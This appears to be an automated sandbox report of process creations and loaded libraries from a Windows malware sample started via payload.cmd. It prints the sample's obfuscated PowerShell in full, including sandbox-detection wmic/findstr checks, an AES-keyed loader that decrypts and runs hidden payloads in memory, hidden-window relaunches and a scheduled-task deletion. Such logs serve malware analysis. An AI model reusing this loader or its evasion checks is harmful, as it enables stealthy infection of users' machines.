Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)
+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
